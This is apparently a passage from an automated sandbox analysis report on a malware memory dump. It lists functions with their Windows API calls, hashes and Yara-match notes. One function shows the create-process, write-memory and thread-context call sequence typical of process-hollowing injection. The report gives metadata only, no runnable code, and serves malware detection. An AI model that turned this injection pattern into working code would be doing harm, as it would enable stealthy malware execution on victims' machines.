                                                      • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 00429456
                                                      • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00429467
                                                      • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 00429478
                                                      • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00429489
                                                      • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0042949A
                                                      • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 004294AB
                                                      • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 004294BC
                                                      • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 004294CD
                                                      • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 004294DE
                                                      • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 004294EF
                                                      • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00429500
                                                      • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00429511
                                                      • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 00429522
                                                      • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 00429533
                                                      • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 00429544
                                                      • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00429555
                                                      • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 00429566
                                                      • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 00429577
                                                      • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 00429588
                                                      • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00429599
                                                      • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 004295AA
                                                      • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 004295BB
                                                      • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 004295CC
                                                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 004295DD
                                                      • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 004295EE
                                                      • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 004295FF
                                                      • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 00429610
                                                      • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00429621
                                                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 00429632
                                                      • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 00429643
                                                      • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 00429654
                                                      • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 00429665
                                                      • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 00429676
                                                      • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 00429687
                                                      • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 00429698
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$HandleModule
                                                      • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                                      • API String ID: 667068680-295688737
                                                      • Opcode ID: 4670dea31c1608621281fd21892e7f61742321bec9bdc48a4d0cc8c6a5f12e6a
                                                      • Instruction ID: 9db1d203b62b979cd5eac0c7f6a5698cb31e7315f3c9d30f48096ed1632c4aa7
                                                      • Opcode Fuzzy Hash: 4670dea31c1608621281fd21892e7f61742321bec9bdc48a4d0cc8c6a5f12e6a
                                                      • Instruction Fuzzy Hash: 3861AA71995360BBCB005FB4ED0DB563BA8BA1AB43324053FF901D25B6EBF980848B5D
                                                      Function 00408070 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 121memoryprocessthreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040809D
                                                      • CreateProcessA.KERNEL32 ref: 004080FB
                                                      • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00408114
                                                      • GetThreadContext.KERNEL32(?,00000000), ref: 00408129
                                                      • ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 00408149
                                                      • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 0040818B
                                                      • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 004081A8
                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00408261
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ProcessVirtual$AllocMemory$ContextCreateFileFreeModuleNameReadThreadWrite
                                                      • String ID: $VUUU$invalid stoi argument
                                                      • API String ID: 3796053839-3954507777
                                                      • Opcode ID: a6eeef2fa584c0b932229ef9536b32f5c55a64671cb7b4344f52a608015dc893
                                                      • Instruction ID: f041e695f941af7b06446caa1a3437145d5dac3473181cda5356b20cb1f842c2
                                                      • Opcode Fuzzy Hash: a6eeef2fa584c0b932229ef9536b32f5c55a64671cb7b4344f52a608015dc893
                                                      • Instruction Fuzzy Hash: 9A417F70644701AFD7209B60DD05F967BE8BF88B05F00042AB784A62E0DBB4E954CB9A
                                                      Function 00442126 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 251COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00436DD0: GetLastError.KERNEL32(00000000,00000000,?,00437BB7,?,00000000,00000000,?,00438071,00000000,00000000,00000000,00000000,8B18EC83,00464158,00000010), ref: 00436DD5
                                                        • Part of subcall function 00436DD0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00438071,00000000,00000000,00000000,00000000,8B18EC83,00464158,00000010,00431112,00000000,00000000,00000000), ref: 00436E73
                                                      • GetACP.KERNEL32(?,?,?,?,?,?,004351D7,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 004421E7
                                                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004351D7,?,?,?,00000055,?,-00000050,?,?), ref: 00442212
                                                      • _wcschr.LIBVCRUNTIME ref: 004422A6
                                                      • _wcschr.LIBVCRUNTIME ref: 004422B4
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00442375
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                      • String ID: utf8$aE
                                                      • API String ID: 4147378913-399719714
                                                      • Opcode ID: 5ec4bfb4ad63d56cc2308d790e3181faed87f106d0d47a9333c1811a31555170
                                                      • Instruction ID: 5f90f548c6c6e364996cf661ccd3f022b14e1a3cc5b38b91ab9d96edb2a47106
                                                      • Opcode Fuzzy Hash: 5ec4bfb4ad63d56cc2308d790e3181faed87f106d0d47a9333c1811a31555170
                                                      • Instruction Fuzzy Hash: 3971E971600305AAF724AF36CD46BAB73A8EF48704F54406BFA05D7281EAFCE941866D
                                                      Function 00442A87 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 183COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00436DD0: GetLastError.KERNEL32(00000000,00000000,?,00437BB7,?,00000000,00000000,?,00438071,00000000,00000000,00000000,00000000,8B18EC83,00464158,00000010), ref: 00436DD5
                                                        • Part of subcall function 00436DD0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00438071,00000000,00000000,00000000,00000000,8B18EC83,00464158,00000010,00431112,00000000,00000000,00000000), ref: 00436E73
                                                        • Part of subcall function 00436DD0: _free.LIBCMT ref: 00436E32
                                                        • Part of subcall function 00436DD0: _free.LIBCMT ref: 00436E68
                                                      • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00442B93
                                                      • IsValidCodePage.KERNEL32(00000000), ref: 00442BDC
                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 00442BEB
                                                      • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00442C33
                                                      • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00442C52
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                      • String ID: aE
                                                      • API String ID: 949163717-2657188709
                                                      • Opcode ID: 7700218cab09b4efaeec657f10b300e5570156f09a8e9f78ea85bd9c63e632fa
                                                      • Instruction ID: 65e7fc6fd7df5464d0980f18d4520dc5feb52c9ba4fd3c8b7b1ad039447ec695
                                                      • Opcode Fuzzy Hash: 7700218cab09b4efaeec657f10b300e5570156f09a8e9f78ea85bd9c63e632fa
                                                      • Instruction Fuzzy Hash: F7519371A00245AFEB10DFA5CD45ABF77B8FF48701F85446AF900E7291DBB8A904CB69
                                                      Function 004428B2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLocaleInfoW.KERNEL32(?,2000000B,00442BD0,00000002,00000000,?,?,?,00442BD0,?,00000000), ref: 0044294B
                                                      • GetLocaleInfoW.KERNEL32(?,20001004,00442BD0,00000002,00000000,?,?,?,00442BD0,?,00000000), ref: 00442974
                                                      • GetACP.KERNEL32(?,?,00442BD0,?,00000000), ref: 00442989
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InfoLocale
                                                      • String ID: ACP$OCP
                                                      • API String ID: 2299586839-711371036
                                                      • Opcode ID: da544cd987ee321140e620090b139fc81f4842a7e9bf52881ff3bc9f30605441
                                                      • Instruction ID: af570630598a51fa7b062114fab0c15fdc0e2c648eac9bf648b74f7d766c84de
                                                      • Opcode Fuzzy Hash: da544cd987ee321140e620090b139fc81f4842a7e9bf52881ff3bc9f30605441
                                                      • Instruction Fuzzy Hash: 7021C4A2B00105A7F7348F14CA00B9BB3A6AB58F54FDA4166F90AD7324EBB6DD41C75C
                                                      Function 0042A4A5 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0042A4B1
                                                      • IsDebuggerPresent.KERNEL32 ref: 0042A57D
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042A59D
                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 0042A5A7
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                      • String ID:
                                                      • API String ID: 254469556-0
                                                      • Opcode ID: 7bc20087304dc69425af26d90172f719b7b3eaa424f4063a30b44ab8ff03e3c4
                                                      • Instruction ID: b10c2ea21ce6a5d2fe90161df8e04ace66a9c518b0087ce6fd1fcca5370ec2b0
                                                      • Opcode Fuzzy Hash: 7bc20087304dc69425af26d90172f719b7b3eaa424f4063a30b44ab8ff03e3c4
                                                      • Instruction Fuzzy Hash: 28310775D013289BDB10DFA4D989BCDBBB8AF08705F5041EAE40DAB250EB759A848F49
                                                      Function 004296A7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15timeCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetSystemTimePreciseAsFileTime.KERNEL32(?,0042938F,00000000,?,?,?,004293C4,00412350,?,?,?,?,?,00428E68,00412350,00000001), ref: 004296C0
                                                      • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,0042938F,00000000,?,?,?,004293C4,00412350,?,?,?,?,?,00428E68), ref: 004296C4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Time$FileSystem$Precise
                                                      • String ID: p"B
                                                      • API String ID: 743729956-2496714718
                                                      • Opcode ID: 8ceba82b2ce19afb895b1dff61bc97c27ae05f57bebffb06c926b77f9a408463
                                                      • Instruction ID: 07f7e5af0bf60bc2275fd628d1950506e5c4dfde5ac2393f350775c1edb65769
                                                      • Opcode Fuzzy Hash: 8ceba82b2ce19afb895b1dff61bc97c27ae05f57bebffb06c926b77f9a408463
                                                      • Instruction Fuzzy Hash: 56D02236601238978F016B80FC085ADBB98EF04B12B440077F90D93231CBA29C108BDE
                                                      Function 00442539 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00436DD0: GetLastError.KERNEL32(00000000,00000000,?,00437BB7,?,00000000,00000000,?,00438071,00000000,00000000,00000000,00000000,8B18EC83,00464158,00000010), ref: 00436DD5
                                                        • Part of subcall function 00436DD0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00438071,00000000,00000000,00000000,00000000,8B18EC83,00464158,00000010,00431112,00000000,00000000,00000000), ref: 00436E73
                                                        • Part of subcall function 00436DD0: _free.LIBCMT ref: 00436E32
                                                        • Part of subcall function 00436DD0: _free.LIBCMT ref: 00436E68
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044258D
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004425D7
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044269D
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InfoLocale$ErrorLast_free
                                                      • String ID:
                                                      • API String ID: 3140898709-0
                                                      • Opcode ID: 221d76c4318afbeaf3b95bd96d76aff6c49629ab69b412c2cc609c47c04b6745
                                                      • Instruction ID: 5ea523c0ed242e2d20e30eb55798ab89f0a1b679829d1e62418643baced88ba9
                                                      • Opcode Fuzzy Hash: 221d76c4318afbeaf3b95bd96d76aff6c49629ab69b412c2cc609c47c04b6745
                                                      • Instruction Fuzzy Hash: 9A61B1716002179FEB28AF25DE82BAB77A8FF04310F51417BF905C6285E7B8D991CB58
                                                      Function 0042EE6D Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0042EF65
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0042EF6F
                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0042EF7C
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                      • String ID:
                                                      • API String ID: 3906539128-0
                                                      • Opcode ID: 32501adab060376cdc0181eeebb2595e17cb320e8dd61b08f52dd60b715bba26
                                                      • Instruction ID: f361088f0d4e0e4884128a2278aafb1a8dc27e766210c34af79892b09cc2d6a2
                                                      • Opcode Fuzzy Hash: 32501adab060376cdc0181eeebb2595e17cb320e8dd61b08f52dd60b715bba26
                                                      • Instruction Fuzzy Hash: 8231B574901228ABCB21DF65D98978DBBB8BF18714F5041EAE40CA6251E7749F818F49
                                                      Function 0042DE60 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(?,?,0042DE5F,00000000,00000000,?,00000000,?,00438071), ref: 0042DE82
                                                      • TerminateProcess.KERNEL32(00000000,?,0042DE5F,00000000,00000000,?,00000000,?,00438071), ref: 0042DE89
                                                      • ExitProcess.KERNEL32 ref: 0042DE9B
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process$CurrentExitTerminate
                                                      • String ID:
                                                      • API String ID: 1703294689-0
                                                      • Opcode ID: 29340e7bfda7ad7b50886f96714fac72c92b3098ca6ce75e64e335c7c5e442b1
                                                      • Instruction ID: e84422aa0ee7f81a9c8f6ca0bf171272c4cc3621c8a04ca038815eaafff8090d
                                                      • Opcode Fuzzy Hash: 29340e7bfda7ad7b50886f96714fac72c92b3098ca6ce75e64e335c7c5e442b1
                                                      • Instruction Fuzzy Hash: 29E04631500618ABCB113B59EC08A5A3B29EB50342F428469F804DA232CB79DC81CA89
                                                      Function 004389DE Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00435D32,?,20001004,00000000,00000002,?,?,0043533F), ref: 00438A12
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InfoLocale
                                                      • String ID: p"B
                                                      • API String ID: 2299586839-2496714718
                                                      • Opcode ID: 32541793b72b530a81baa30765d9e49a508c946d45b2e2da03d61495df7fad4e
                                                      • Instruction ID: 189f04a6c4868017904d1405b1ea4af0b54d8d3c83b69fb18bb0939a9bfb30bf
                                                      • Opcode Fuzzy Hash: 32541793b72b530a81baa30765d9e49a508c946d45b2e2da03d61495df7fad4e
                                                      • Instruction Fuzzy Hash: 5FE04F31540318BBCF126F61EC04EAEBF65EF48762F10402AFD0566231CF7A8921AADD
                                                      Function 0042A68F Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0042A6A5
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FeaturePresentProcessor
                                                      • String ID:
                                                      • API String ID: 2325560087-0
                                                      • Opcode ID: ff96371d1ae292d9ada91ddf3d5dd7d0aad5fd29b9590dea8af1e6d6e4db4c05
                                                      • Instruction ID: 1545e737f40d03c2a147906e889db0c95b9c198f752dabbe9d1e86782818eed4
                                                      • Opcode Fuzzy Hash: ff96371d1ae292d9ada91ddf3d5dd7d0aad5fd29b9590dea8af1e6d6e4db4c05
                                                      • Instruction Fuzzy Hash: 6F518FB1A003158BDB15CF55E8857AAB7F4FB48310F15846ACC05EB391E3B8DD50CBAA
                                                      Function 0044278C Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00436DD0: GetLastError.KERNEL32(00000000,00000000,?,00437BB7,?,00000000,00000000,?,00438071,00000000,00000000,00000000,00000000,8B18EC83,00464158,00000010), ref: 00436DD5
                                                        • Part of subcall function 00436DD0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00438071,00000000,00000000,00000000,00000000,8B18EC83,00464158,00000010,00431112,00000000,00000000,00000000), ref: 00436E73
                                                        • Part of subcall function 00436DD0: _free.LIBCMT ref: 00436E32
                                                        • Part of subcall function 00436DD0: _free.LIBCMT ref: 00436E68
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004427E0
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast_free$InfoLocale
                                                      • String ID:
                                                      • API String ID: 2003897158-0
                                                      • Opcode ID: add787d7845f4a774a03af30bae9e49826061530aecb263a1c1acf9e08ffd9be
                                                      • Instruction ID: 07d3857131a968de86a97c751e810957ba826f5a53c4075382b3af7cb9a32e65
                                                      • Opcode Fuzzy Hash: add787d7845f4a774a03af30bae9e49826061530aecb263a1c1acf9e08ffd9be
                                                      • Instruction Fuzzy Hash: A92186726101166BEB28AF15DD42A7F77A8EF44314F50417FFD01D6251EBB8DD408A58
                                                      Function 00442413 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00436DD0: GetLastError.KERNEL32(00000000,00000000,?,00437BB7,?,00000000,00000000,?,00438071,00000000,00000000,00000000,00000000,8B18EC83,00464158,00000010), ref: 00436DD5
                                                        • Part of subcall function 00436DD0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00438071,00000000,00000000,00000000,00000000,8B18EC83,00464158,00000010,00431112,00000000,00000000,00000000), ref: 00436E73
                                                      • EnumSystemLocalesW.KERNEL32(00442539,00000001,00000000,?,-00000050,?,00442B67,00000000,?,?,?,00000055,?), ref: 00442485
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                      • String ID:
                                                      • API String ID: 2417226690-0
                                                      • Opcode ID: e0d58fd9f92e47267dfe9193589d03fc88d9d93a5a080e76f54d0c721a2ebbce
                                                      • Instruction ID: d0ca285bb40b9cc27fd9487dcd8eeb86c864f581bf4f90510ef8df1d4546dc35
                                                      • Opcode Fuzzy Hash: e0d58fd9f92e47267dfe9193589d03fc88d9d93a5a080e76f54d0c721a2ebbce
                                                      • Instruction Fuzzy Hash: 1F118C3B2007019FEB189F39D8A167BB791FF80318B58442EF94687B40D3B5B802C744
                                                      Function 004429B8 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00436DD0: GetLastError.KERNEL32(00000000,00000000,?,00437BB7,?,00000000,00000000,?,00438071,00000000,00000000,00000000,00000000,8B18EC83,00464158,00000010), ref: 00436DD5
                                                        • Part of subcall function 00436DD0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00438071,00000000,00000000,00000000,00000000,8B18EC83,00464158,00000010,00431112,00000000,00000000,00000000), ref: 00436E73
                                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00442755,00000000,00000000,?), ref: 004429E4
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$InfoLocale
                                                      • String ID:
                                                      • API String ID: 3736152602-0
                                                      • Opcode ID: d2fe304e529daf8d3b897b426b2ff07608de749dc24f4138b1a974b2260efc35
                                                      • Instruction ID: 52a21ec650ff7c036804ae91de2c8b3d93aac10a0350f988173e5e01ba25c219
                                                      • Opcode Fuzzy Hash: d2fe304e529daf8d3b897b426b2ff07608de749dc24f4138b1a974b2260efc35
                                                      • Instruction Fuzzy Hash: 40F0A9326101167BEB345A25CD45BBB7754EB40754F55442AFD06B3380EAB8FD41C5E4
                                                      Function 00442321 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00436DD0: GetLastError.KERNEL32(00000000,00000000,?,00437BB7,?,00000000,00000000,?,00438071,00000000,00000000,00000000,00000000,8B18EC83,00464158,00000010), ref: 00436DD5
                                                        • Part of subcall function 00436DD0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00438071,00000000,00000000,00000000,00000000,8B18EC83,00464158,00000010,00431112,00000000,00000000,00000000), ref: 00436E73
                                                        • Part of subcall function 00436DD0: _free.LIBCMT ref: 00436E32
                                                        • Part of subcall function 00436DD0: _free.LIBCMT ref: 00436E68
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00442375
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast_free$InfoLocale
                                                      • String ID: utf8$aE
                                                      • API String ID: 2003897158-399719714
                                                      • Opcode ID: aa57169f8023b9fd9dd72a25ef9c8c7edbfc890799864e4c4e1c76533f01937e
                                                      • Instruction ID: beb5681054ba013d59b30fc56a9405a7517dad23acb6f2410d214f7bb116928b
                                                      • Opcode Fuzzy Hash: aa57169f8023b9fd9dd72a25ef9c8c7edbfc890799864e4c4e1c76533f01937e
                                                      • Instruction Fuzzy Hash: 29F08132610115ABD714AF35DD45ABE73A8DF49314F11017EBA02D7281EAB8AD058658
                                                      Function 004424AE Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00436DD0: GetLastError.KERNEL32(00000000,00000000,?,00437BB7,?,00000000,00000000,?,00438071,00000000,00000000,00000000,00000000,8B18EC83,00464158,00000010), ref: 00436DD5
                                                        • Part of subcall function 00436DD0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00438071,00000000,00000000,00000000,00000000,8B18EC83,00464158,00000010,00431112,00000000,00000000,00000000), ref: 00436E73
                                                      • EnumSystemLocalesW.KERNEL32(0044278C,00000001,FFFFFFFF,?,-00000050,?,00442B2B,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 004424F8
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                      • String ID:
                                                      • API String ID: 2417226690-0
